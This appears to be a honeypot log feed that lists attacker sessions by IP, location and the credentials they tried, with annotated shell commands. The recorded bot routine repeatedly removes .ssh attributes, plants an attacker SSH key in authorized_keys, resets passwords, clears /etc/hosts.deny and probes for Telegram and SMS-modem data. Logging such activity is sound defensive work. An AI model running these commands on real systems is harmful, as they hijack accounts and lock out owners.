$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 lantern_root_2 (113.125.165.132) β€” Jinan, China Β· 1 session Β· 20 cmds
2026-05-21 09:36 EDT Β· as pham/pham
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "pham\nURleQGOLQgLO\nURleQGOLQgLO"|passwd|bash
$ Enter new UNIX password:
$ echo "pham\nURleQGOLQgLO\nURleQGOLQgLO\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 jade_root_21 (118.196.38.83) β€” Haidian, China Β· 1 session Β· 20 cmds
2026-05-21 09:34 EDT Β· as named/named
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "named\nTRZvLfP2ec7Z\nTRZvLfP2ec7Z"|passwd|bash
$ Enter new UNIX password:
$ echo "named\nTRZvLfP2ec7Z\nTRZvLfP2ec7Z\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 bibimbap_root_3 (183.109.124.136) β€” Dongjak-gu, South Korea Β· 4 sessions Β· 4 cmds
2026-05-06 11:01 EDT Β· as root/Mail$2023, root/blackcat
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ uname -a Γ—4 // OS/kernel identification
🎭 phantom_root_5 (43.230.5.42) β€” Depok, Indonesia Β· 4 sessions Β· 4 cmds
2026-05-06 08:49 EDT Β· as root/blackcat, root/mail@1q2w3e
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ uname -a Γ—4 // OS/kernel identification
🎭 shadow_root_75 (144.31.132.70) β€” Helsinki, Finland Β· 1 session Β· 19 cmds
2026-05-21 08:32 EDT Β· as root/Qwer@2026
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:rrdWeaIHJx9i"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_85 (45.15.227.120) β€” Chisinau, Moldova Β· 1 session Β· 9 cmds
2026-05-21 08:30 EDT Β· as root/admin
network mapping β†’ OS/kernel identification β†’ CPU profiling
$ /ip cloud print
$ ifconfig // network mapping
$ uname -a // OS/kernel identification
$ cat /proc/cpuinfo // CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
🎭 bibimbap_root_2 (210.222.46.15) β€” Incheon, South Korea Β· 4 sessions Β· 4 cmds
2026-05-06 07:55 EDT Β· as root/Cryptolendify94, root/blackcat
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ uname -a Γ—4 // OS/kernel identification
🎭 chateau_root_11 (176.147.144.172) β€” Grenoble, France Β· 1 session Β· 20 cmds
2026-05-21 08:14 EDT Β· as socks/socks
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "socks\nOTslrXlIeUMJ\nOTslrXlIeUMJ"|passwd|bash
$ Enter new UNIX password:
$ echo "socks\nOTslrXlIeUMJ\nOTslrXlIeUMJ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 seoul_root_2 (211.104.137.55) β€” Gangnam-gu, South Korea Β· 4 sessions Β· 4 cmds
2026-05-06 10:30 EDT Β· as root/Cryptolendify90, root/blackcat
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ uname -a Γ—4 // OS/kernel identification
🎭 cipher_root_71 (202.155.236.242) β€” Tai Po, Hong Kong Β· 4 sessions Β· 4 cmds
2026-05-06 10:24 EDT Β· as root/blackcat, root/mail++
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ uname -a Γ—4 // OS/kernel identification
🎭 tiger_root_18 (198.38.81.1) β€” Navi Mumbai, India Β· 5 sessions Β· 5 cmds
2026-05-06 08:17 EDT Β· as root/Mail$2026, root/blackcat
Ran uname 5x across 5 sessions β€” automated OS fingerprinting.
$ uname -a Γ—5 // OS/kernel identification
🎭 panda_root_29 (115.190.166.183) β€” Haidian, China Β· 1 session Β· 1 cmd
2026-05-21 07:29 EDT Β· as root/Test@2022
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 cipher_root_6 (36.50.177.171) β€” QuαΊ­n Hai, Vietnam Β· 1 session Β· 1 cmd
2026-05-21 07:22 EDT Β· as root/blackcat
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 crepe_root_14 (75.119.155.240) β€” Lauterbourg, France Β· 1 session Β· 1 cmd
2026-05-21 07:03 EDT Β· as root/blackcat
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 cowboy_root_3 (70.37.89.177) β€” San Antonio, United States Β· 5 sessions Β· 5 cmds
2026-05-06 07:53 EDT Β· as root/Cryptolendify.2023, root/blackcat
Ran uname 5x across 5 sessions β€” automated OS fingerprinting.
$ uname -a Γ—5 // OS/kernel identification
🎭 shadow_root_5 (152.32.215.47) β€” Hong Kong, Hong Kong Β· 4 sessions Β· 4 cmds
2026-05-06 14:03 EDT Β· as root/MailMail2025, root/blackcat
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ uname -a Γ—4 // OS/kernel identification
🎭 cipher_root_72 (213.211.35.93) β€” Znojmo, Czechia Β· 4 sessions Β· 4 cmds
2026-05-06 12:06 EDT Β· as root/blackcat, root/cryptolendify@#2023@
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ uname -a Γ—4 // OS/kernel identification
🎭 gouda_root_3 (52.232.19.79) β€” Amsterdam, Netherlands Β· 2 sessions Β· 2 cmds
2026-05-06 10:22 EDT Β· as root/blackcat
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 rogue_root_90 (103.19.56.102) β€” Margahayukencana, Indonesia Β· 3 sessions Β· 3 cmds
2026-05-06 10:55 EDT Β· as root/blackcat
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 cipher_root_73 (41.205.23.59) β€” Douala, Cameroon Β· 1 session Β· 1 cmd
2026-05-21 04:40 EDT Β· as root/Admin!2024
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 k-pop_root (1.214.42.172) β€” Gwanak-gu, South Korea Β· 4 sessions Β· 4 cmds
2026-05-06 13:51 EDT Β· as root/Mail@321, root/blackcat
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ uname -a Γ—4 // OS/kernel identification
🎭 cipher_root_20 (103.69.193.110) β€” Thanh XuΓ’n, Vietnam Β· 4 sessions Β· 4 cmds
2026-05-06 11:22 EDT Β· as root/blackcat, root/mail@123!
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ uname -a Γ—4 // OS/kernel identification
🎭 steppe_root (95.47.246.223) β€” St Petersburg, Russia Β· 1 session Β· 9 cmds
2026-05-21 03:50 EDT Β· as root/12345
network mapping β†’ OS/kernel identification β†’ CPU profiling
$ /ip cloud print
$ ifconfig // network mapping
$ uname -a // OS/kernel identification
$ cat /proc/cpuinfo // CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
🎭 k-pop_root_3 (211.62.96.42) β€” Hwaseong-si, South Korea Β· 4 sessions Β· 4 cmds
2026-05-06 11:11 EDT Β· as root/blackcat, root/cryptolendify2025!!!
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ uname -a Γ—4 // OS/kernel identification
🎭 ghost_root_19 (181.188.187.140) β€” La Paz, Bolivia Β· 5 sessions Β· 5 cmds
2026-05-06 08:22 EDT Β· as root/MailMail@2023, root/blackcat
Ran uname 5x across 5 sessions β€” automated OS fingerprinting.
$ uname -a Γ—5 // OS/kernel identification
🎭 wraith_root_5 (2.57.217.229) β€” Tbilisi, Georgia Β· 4 sessions Β· 4 cmds
2026-05-06 13:00 EDT Β· as root/Mail!@2025, root/blackcat
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ uname -a Γ—4 // OS/kernel identification
🎭 shogun_root_8 (20.210.114.78) β€” Tokyo, Japan Β· 1 session Β· 1 cmd
2026-05-21 03:26 EDT Β· as root/blackcat
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 seoul_root_3 (118.218.219.250) β€” Eunpyeong-gu, South Korea Β· 4 sessions Β· 4 cmds
2026-05-06 13:16 EDT Β· as root/blackcat, root/mail~admin
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ uname -a Γ—4 // OS/kernel identification
🎭 wraith_root_73 (123.30.173.110) β€” Hanoi, Vietnam Β· 1 session Β· 1 cmd
2026-05-21 02:27 EDT Β· as root/blackcat
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 sensei_root_2 (210.156.0.132) β€” Chiyoda City, Japan Β· 4 sessions Β· 4 cmds
2026-05-06 14:04 EDT Β· as root/blackcat, root/mail@2023!
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ uname -a Γ—4 // OS/kernel identification
🎭 kiwi_root_2 (13.70.185.98) β€” Melbourne, Australia Β· 1 session Β· 1 cmd
2026-05-21 02:22 EDT Β· as root/blackcat
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 burger_root_45 (64.23.243.67) β€” Santa Clara, United States Β· 1 session Β· 19 cmds
2026-05-21 02:17 EDT Β· as root/Asdf123@
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:eQFrc3yFkNKP"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 stroopwafel_root_11 (23.26.237.24) β€” Haarlem, Netherlands Β· 1 session Β· 20 cmds
2026-05-21 00:48 EDT Β· as datadog/datadog
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "datadog\nU3LHWYACOzWQ\nU3LHWYACOzWQ"|passwd|bash
$ Enter new UNIX password:
$ echo "datadog\nU3LHWYACOzWQ\nU3LHWYACOzWQ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wok_root_23 (14.29.208.128) β€” Shenzhen, China Β· 1 session Β· 20 cmds
2026-05-21 00:47 EDT Β· as runner/123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\n1g5gcU11vMOZ\n1g5gcU11vMOZ"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\n1g5gcU11vMOZ\n1g5gcU11vMOZ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 lotus_2 (103.86.180.10) β€” Pune, India Β· 1 session Β· 20 cmds
2026-05-21 00:36 EDT Β· as auditbeat/auditbeat
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "auditbeat\nKgucmD8Mffm0\nKgucmD8Mffm0"|passwd|bash
$ Enter new UNIX password:
$ echo "auditbeat\nKgucmD8Mffm0\nKgucmD8Mffm0\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 silk_5 (14.18.122.98) β€” Guangzhou, China Β· 1 session Β· 20 cmds
2026-05-21 00:36 EDT Β· as runner/123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\naR0lx7NUcSVO\naR0lx7NUcSVO"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\naR0lx7NUcSVO\naR0lx7NUcSVO\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_16 (74.243.239.219) β€” Dubai, United Arab Emirates Β· 2 sessions Β· 39 cmds
2026-05-21 00:14 EDT Β· as johnny/johnny123, root/orbit
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:bZJbRkGC6eN3"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "johnny123\nBW7oXcLNTCiV\nBW7oXcLNTCiV"|passwd|bash
$ Enter new UNIX password:
$ echo "johnny123\nBW7oXcLNTCiV\nBW7oXcLNTCiV\n"|passwd
🎭 eagle_root_39 (195.26.245.223) β€” St Louis, United States Β· 1 session Β· 1 cmd
2026-05-21 00:25 EDT Β· as admin/P@ssw0rd123#
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 tiger_root_19 (159.65.146.153) β€” Bengaluru, India Β· 1 session Β· 1 cmd
2026-05-21 00:21 EDT Β· as jimster/p@ssw0rd2025@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 specter_root_83 (165.154.6.75) β€” Hong Kong, Hong Kong Β· 1 session Β· 19 cmds
2026-05-20 23:28 EDT Β· as root/cherry
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
